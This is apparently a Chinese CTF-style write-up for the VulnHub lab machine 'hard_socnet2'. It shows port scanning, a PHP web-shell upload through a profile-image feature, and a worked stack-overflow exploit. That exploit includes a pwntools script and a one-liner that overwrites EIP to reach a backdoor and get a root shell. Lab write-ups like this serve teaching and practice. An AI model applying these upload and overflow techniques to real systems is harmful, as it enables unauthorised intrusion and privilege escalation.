vulnhub5

靶机下载地址：

https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova

信息收集

第一步信息收集，还是老方法我习惯 fscan 和 nmap 一起用

Fscan 简单探测全局信息

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ ./fscan_amd64 -h 192.168.120.141

   ___                              _  
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <  
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.120.141 is alive
[*] Icmp alive hosts len is: 1
192.168.120.141:22 open
192.168.120.141:80 open
192.168.120.141:8000 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://192.168.120.141:8000 code:501 len:216    title:Error response
[*] WebTitle: http://192.168.120.141    code:200 len:10609  title:Social Network

nmap 扫描全端口

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap --min-rate 10000 -p- 192.168.120.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-01 19:15 CST
Nmap scan report for 192.168.120.141
Host is up (0.000033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
MAC Address: 00:0C:29:F4:0E:58 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.00 seconds

nmap 扫描开放端口和操作系统的信息

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap -sT -sV -O -p 22,80,8000 192.168.120.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-01 19:16 CST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 19:16 (0:00:12 remaining)
Nmap scan report for 192.168.120.141
Host is up (0.00013s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open  http    BaseHTTPServer 0.3 (Python 2.7.15rc1)
MAC Address: 00:0C:29:F4:0E:58 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.57 seconds

getshell

开放了两个 web 服务一个是 apache2 的，还有一个是 python 的

这里正常思路就是先访问 web 服务了，首先是 80 端口的服务

​​

是一个用户登录注册的地方，因为这里没有 admin 的邮箱地址，所以我们只能尝试使用注册来看看登录后的系统是否存在漏洞

首先我们注册账号：

​​

登录后简单测一下漏洞：

​​

发现有 xss（但是没啥用）

​​

测试其他漏洞：

​​

发现了文件上传，这里可以简单测试一下：

​​

传个马，似乎成功了，试一下连接：

​​

找到地址:http://192.168.120.141/data/images/profiles/3.php​

​​

可以成功连接

权限提升 1

提权：

​​

发现这个 cve 依旧可以。。。

权限提升 2

但是这里的预期解似乎不是这个,预期解需要 Pwn

现学 Pwn 咯

我们 getshell 之后可以在/home/user 目录看到

​​

一个 root 权限启动的服务

我们下载到 Kali ​用 pwngdb ​调试他(未安装可以安装一下：pwndbg/pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy (github.com))

先用 checksec 看一下开启的保护：

┌──(kali㉿kali)-[~/Desktop]
└─$ checksec add_record 
[*] '/home/kali/Desktop/add_record'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments

除了一个 Stack，其他全关

启动一下 Pwngdb：

┌──(root㉿kali)-[/home/kali/Desktop]
└─# gdb -q add_record
pwndbg: loaded 147 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list.                                
pwndbg: created $rebase, $ida GDB functions (can be used with print/break)                                                                  
Reading symbols from add_record...
(No debugging symbols found in add_record)
------- tip of the day (disable with set show-tips off) -------
Pwndbg context displays where the program branches to thanks to emulating few instructions into the future. You can disable this with set emulate off which may also speed up debugging                            
pwndbg> 

我们先测试哪里存在栈溢出（因为只会栈溢出）

先准备好多个 A 用于测试栈溢出：

┌──(kali㉿kali)-[~/Desktop]
└─$ python -c "print('A'*1000)"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

用 r 执行让程序跑起来：

​​

输入后发现程序异常直接退出，判断这里不存在栈溢出，接着下一个点测试：

​​

同样正常退出，接着往下测试，直到最后一个 explain：

pwndbg> r
Starting program: /home/kali/Desktop/add_record 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".                                                                  
Welcome to Add Record application
Use it to add info about Social Network 2.0 Employees
Employee Name(char): a
Years worked(int): 1
Salary(int): 1
Ever got in trouble? 1 (yes) or 0 (no): 1
Explain: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────
*EAX  0xffffd27e ◂— 0x41414141 ('AAAA')
*EBX  0x41414141 ('AAAA')
*ECX  0xffffd6c0 ◂— 'AAAA'
*EDX  0xffffd662 ◂— 'AAAA'
*EDI  0xffffd340 ◂— 0x41414141 ('AAAA')
*ESI  0x80488d0 (__libc_csu_init) ◂— push ebp
*EBP  0x41414141 ('AAAA')
*ESP  0xffffd2c0 ◂— 0x41414141 ('AAAA')
*EIP  0x41414141 ('AAAA')
──────────────────[ DISASM / i386 / set emulate on ]───────────────────
Invalid address 0x41414141










───────────────────────────────[ STACK ]───────────────────────────────
00:0000│ esp 0xffffd2c0 ◂— 0x41414141 ('AAAA')
... ↓        7 skipped
─────────────────────────────[ BACKTRACE ]─────────────────────────────
 ► 0 0x41414141
   1 0x41414141
   2 0x41414141
   3 0x41414141
   4 0x41414141
   5 0x41414141
   6 0x41414141
   7 0x41414141
───────────────────────────────────────────────────────────────────────

这里发现可以覆盖掉栈的地址，说明我们这里是可能存在漏洞的

如何利用呢？

利用 IDA 打开这个程序可以发现

​​

这个程序是存在 backdoor ​的，直接返回一个 system('/bin/sh')​

所以只要覆盖掉 EIP ​的地址为 backdoor ​函数的地址即可执行 backdoor 返回一个 /bin/sh​

下一步工作就是测试哪个位置可以覆盖 EIP，因为我们输入的 1000 个 A 中不知道具体是哪几个站住了 EIP 的地址

只知道确实是可以覆盖的：

​​

所以我们利用 MSF 生成的随机字符串来定位：

msf-pattern_create -l 1000

​​

如图我们可以知道是 0Ac1 覆盖了 EIP，所以我们查找 0Ac1 前面有几个字符：

msf-pattern_offset -q 0Ab1

​​

发现是 62 个，所以我们前面填充 62 位

开始编写 EXP：

​​

这里看到 backdoor ​的地址是 0x08048676​

垃圾字符是 62 个

写 EXP：

from pwn import * 

p = process("./add_record")
backdoor = 0x8048676
p.sendline(b'1')
p.sendline(b'1')
p.sendline(b'1')
p.sendline(b'1')

payload = b'a'*62 + p32(backdoor)
p.sendline(payload)
p.interactive()

但是只能在目标系统上执行不能打远程环境，用这个

python -c "import struct;print('aa\n1\n1\n1\n' + 'A'*62 + struct.pack('I',0x08048676))" > payload

然后运行

cat payload - | ./add_record

即可 getshell，并且为 root 权限，短划线 -​ 表示将前一个命令的标准输出（在这种情况下是 "payload" 字符串）重定向到 ./add_record 程序的标准输入，这样 ./add_record 将从标准输入读取 "payload" 字符串

​​

Pwn 学习参考链接

【星盟安全】PWN 全集，从入门到精通，最通俗易懂的 CTF，持续更新中_哔哩哔哩_bilibili

pwn 学习----定位溢出点位置_pwn 通过把编译 判断溢出位置-CSDN 博客

‍